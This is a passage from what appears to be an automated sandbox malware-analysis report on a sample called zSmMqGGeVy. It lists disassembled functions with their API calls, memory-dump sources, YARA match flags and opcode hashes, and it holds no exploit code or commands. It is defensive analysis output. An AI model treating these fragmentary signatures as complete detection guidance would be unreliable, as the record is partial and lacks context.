                                                  • Opcode Fuzzy Hash: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                                  • Instruction Fuzzy Hash: 1931E172B00004AFDF14AF68DC45FAEB7A8EF48704F0541ADEA05AB252DA31AD52CB94
                                                  Function 10002986 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                                  • String ID:
                                                  • API String ID: 3136044242-0
                                                  • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                  • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                                  • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                  • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                                  Function 00416FE1 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00416FF9
                                                    • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                    • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                  • _free.LIBCMT ref: 0041700B
                                                  • _free.LIBCMT ref: 0041701D
                                                  • _free.LIBCMT ref: 0041702F
                                                  • _free.LIBCMT ref: 00417041
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                                  • Instruction ID: 1bbc7c59558bdb80d40cd5d769ae83ba842cf1fe79b15496f27bd1d3c69b9f62
                                                  • Opcode Fuzzy Hash: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                                  • Instruction Fuzzy Hash: 2AF04432705240678534DB5DE486D967BE9AF44760758481BF508D7A12D73CFCD0465C
                                                  Function 00EA7248 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00EA7260
                                                    • Part of subcall function 00EA1D29: HeapFree.KERNEL32(00000000,00000000,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?), ref: 00EA1D3F
                                                    • Part of subcall function 00EA1D29: GetLastError.KERNEL32(?,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?,?), ref: 00EA1D51
                                                  • _free.LIBCMT ref: 00EA7272
                                                  • _free.LIBCMT ref: 00EA7284
                                                  • _free.LIBCMT ref: 00EA7296
                                                  • _free.LIBCMT ref: 00EA72A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                  • Instruction ID: b5a43a264402057dca5ad0374bb06e7166a664a52303e92666fcb73d6030fece
                                                  • Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                  • Instruction Fuzzy Hash: 05F0C8726082146B8534DB58FC87D1633DEEB09320B652845F498FF111C730FC904675
                                                  Function 1000C51E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 1000C536
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 1000C548
                                                  • _free.LIBCMT ref: 1000C55A
                                                  • _free.LIBCMT ref: 1000C56C
                                                  • _free.LIBCMT ref: 1000C57E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                  • Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
                                                  • Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                                  • Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4
                                                  Function 00E958D0 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 476COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O*$rB$rB
                                                  • API String ID: 0-546290271
                                                  • Opcode ID: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
                                                  • Instruction ID: cf9da1ea323e585b929fa742fad3193605abab39473e0dbef769d19adcb6c4c8
                                                  • Opcode Fuzzy Hash: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
                                                  • Instruction Fuzzy Hash: 0512D071D002489BDF15EBB4DC51BEDB7B4AF55304F5090ACE416BB2A2EF349A48CBA1
                                                  Function 00E9516B Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 383sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00E993D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E993E2
                                                    • Part of subcall function 00E993D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E9941F
                                                  • __Init_thread_footer.LIBCMT ref: 00E951B2
                                                    • Part of subcall function 00E9938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E99397
                                                    • Part of subcall function 00E9938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E993CA
                                                  • Sleep.KERNEL32(000007D0), ref: 00E9552A
                                                  • Sleep.KERNEL32(000007D0), ref: 00E95544
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
                                                  • String ID: updateSW
                                                  • API String ID: 500923978-2484434887
                                                  • Opcode ID: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
                                                  • Instruction ID: c2dc207d201c41f94b7e828d79d108257c9f390113eccbd07e93c37e50046444
                                                  • Opcode Fuzzy Hash: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
                                                  • Instruction Fuzzy Hash: 2FD10372A016548BDF29EB28CC897ADB7B5EF41304F5451E9D809BB292DB359EC0CF81
                                                  Function 10007CBA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: *?
                                                  • API String ID: 269201875-2564092906
                                                  • Opcode ID: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                  • Instruction ID: 7b94f7270babd41a129a228fbe6cecbdc5f775369f8c1ab1d48f9322781d5c4e
                                                  • Opcode Fuzzy Hash: 5cf7f851aaec087829ec43eeaab6f60b67ed4c75ee81a41c35adb74eb9a8a420
                                                  • Instruction Fuzzy Hash: 0C614175D0021A9FEB14CFA9C8815EDFBF5FF48390B2581AAE809F7344D675AE418B90
                                                  Function 10004F12 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree), ref: 10004F1F
                                                  • GetLastError.KERNEL32(?,10004EC3,00000000,?,00000001,?,?,?,10004FB2,00000001,FlsFree,10011CC0,FlsFree,00000000,?,10003ECF), ref: 10004F29
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 10004F51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID: api-ms-
                                                  • API String ID: 3177248105-2084034818
                                                  • Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                  • Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
                                                  • Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
                                                  • Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9
                                                  Function 00412822 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  • Opcode ID: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                                  • Instruction ID: 6012ccbf35aa319517377e765832e55e269021952583a9b626e33c473f35baf7
                                                  • Opcode Fuzzy Hash: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                                  • Instruction Fuzzy Hash: A6B13571A002459FDB25CF68CA817EEBBE1EF55340F14816BD845EB341D2BC9992CB68
                                                  Function 00EA2A89 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  • Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                  • Instruction ID: c4496f5c4a7fa0dbd25b432f909bf4047e8084b68476a119e05f7f44aeffd2ab
                                                  • Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                  • Instruction Fuzzy Hash: 96B115329002469FDB15CF2CC8817EEBBE5EF5A354F1491ADEA54BF242D634AD01CB60
                                                  Function 00E91AE7 Relevance: 6.3, APIs: 4, Instructions: 298networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00E91B6C
                                                  • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00E91B8B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileInternet$PointerRead
                                                  • String ID:
                                                  • API String ID: 3197321146-0
                                                  • Opcode ID: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                                  • Instruction ID: f4915d5b4923912e612deefc58caaea93c7a963cc1d80365f8674ea54b3f8f41
                                                  • Opcode Fuzzy Hash: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                                  • Instruction Fuzzy Hash: C2C17A71A00218AFEB25CF24CD85BEAB7B9FF49304F1041D9E909A7691DB75AE84CF50
                                                  Function 0040AE84 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                  • Instruction ID: 88ef4a02ba2930d6a04adc46f9a2f5105df9e51eba4518f207ac4bbffbfe15f9
                                                  • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                  • Instruction Fuzzy Hash: E151D1B1600303AFDB299F15D841BABB3A4EF44314F14413FE801A76D2E739AC65D79A
                                                  Function 00E9B0EB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                  • Instruction ID: a59788ada44c619e10d89277c4ca80204665a8ef3635509c997e384997aa75d4
                                                  • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                  • Instruction Fuzzy Hash: 9D51DE72A01202AFDF298F51FA91BBE77E4EF04314F24502DE845B76A1D731AD81CB90
                                                  Function 10003EDA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                  • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                                  • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                  • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                                  Function 00415A49 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040FC08: _free.LIBCMT ref: 0040FC16
                                                    • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0041384C,?,00000000,00000000), ref: 00413599
                                                  • GetLastError.KERNEL32 ref: 00415AB1
                                                  • __dosmaperr.LIBCMT ref: 00415AB8
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00415AF7
                                                  • __dosmaperr.LIBCMT ref: 00415AFE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                  • String ID:
                                                  • API String ID: 167067550-0
                                                  • Opcode ID: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                  • Instruction ID: 3f7c4113f524ad2c0abd5e3f91609bb3d7c3a41f61a1f3e5b12bbd4c913db815
                                                  • Opcode Fuzzy Hash: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                  • Instruction Fuzzy Hash: 5221D871604615EFDB20AF66DCC19EBB76CEF443A8710862BF82497291D73CED8187A4
                                                  Function 00EA5CB0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00E9FE6F: _free.LIBCMT ref: 00E9FE7D
                                                    • Part of subcall function 00EA375E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00EA88CA,?,?,?,00000000,?,00EA8639,0000FDE9,00000000,?), ref: 00EA3800
                                                  • GetLastError.KERNEL32 ref: 00EA5D18
                                                  • __dosmaperr.LIBCMT ref: 00EA5D1F
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00EA5D5E
                                                  • __dosmaperr.LIBCMT ref: 00EA5D65
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                  • String ID:
                                                  • API String ID: 167067550-0
                                                  • Opcode ID: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                                  • Instruction ID: ab345edf4f16e5e7c443bb143d41b0752ba85c07b7f8a003ca3d8cd3b20f8873
                                                  • Opcode Fuzzy Hash: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                                  • Instruction Fuzzy Hash: 6421C5B2600A05BFDB20AF658C8496BB7ECEF0A3687119518F91ABF150E731FD4087A0
                                                  Function 10007BCE Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE
                                                    • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                  • GetLastError.KERNEL32 ref: 10007C36
                                                  • __dosmaperr.LIBCMT ref: 10007C3D
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                  • __dosmaperr.LIBCMT ref: 10007C83
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                  • String ID:
                                                  • API String ID: 167067550-0
                                                  • Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                  • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                                  • Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
                                                  • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                                  Function 00EA1DB1 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                  • Instruction ID: 01c073d8d79eab8830238d6483e03b3ebb8acd186465fca52440242d5d830f33
                                                  • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                  • Instruction Fuzzy Hash: 0821DD71E01321BBCB318B249C85B9A7768AF5B7A4F2595A1FD16BF290D630FC00C6E4
                                                  Function 004111FD Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00401ED8,?,00401EDC,0040C3A9,?,00401ED8,771ADF80,?,004114AD,00000000,771ADF80,00000000,00000000,00401ED8), ref: 00411202
                                                  • _free.LIBCMT ref: 0041125F
                                                  • _free.LIBCMT ref: 00411295
                                                  • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004114AD,00000000,771ADF80,00000000,00000000,00401ED8), ref: 004112A0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                  • Instruction ID: cded345c8d5c530dafeb31fb37215a8dc2974a232bbf80fd36b18c5a372c037c
                                                  • Opcode Fuzzy Hash: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                  • Instruction Fuzzy Hash: 8011A7327005002A965127B57C86EFB26698BC57B8B64037BFB15E22F1EA3D8C92411D
                                                  Function 00EA1464 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00E9213F,?,00E92143,00E9C610,?,00E9213F,0041D0A0,?,00EA1714,00000000,0041D0A0,00000000,00000000,00E9213F), ref: 00EA1469
                                                  • _free.LIBCMT ref: 00EA14C6
                                                  • _free.LIBCMT ref: 00EA14FC
                                                  • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,00EA1714,00000000,0041D0A0,00000000,00000000,00E9213F), ref: 00EA1507
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                  • Instruction ID: 68eef3ed78905440353f6f750ead508f8ec4e3945b021a18227b055a80c5a54e
                                                  • Opcode Fuzzy Hash: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                  • Instruction Fuzzy Hash: FE11E9367001042FD62127BC5C86D7A2ADA8BCF379F6532B8F634BE1E1DF25AC115115
                                                  Function 10006E9C Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
                                                  • _free.LIBCMT ref: 10006EFE
                                                  • _free.LIBCMT ref: 10006F34
                                                  • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
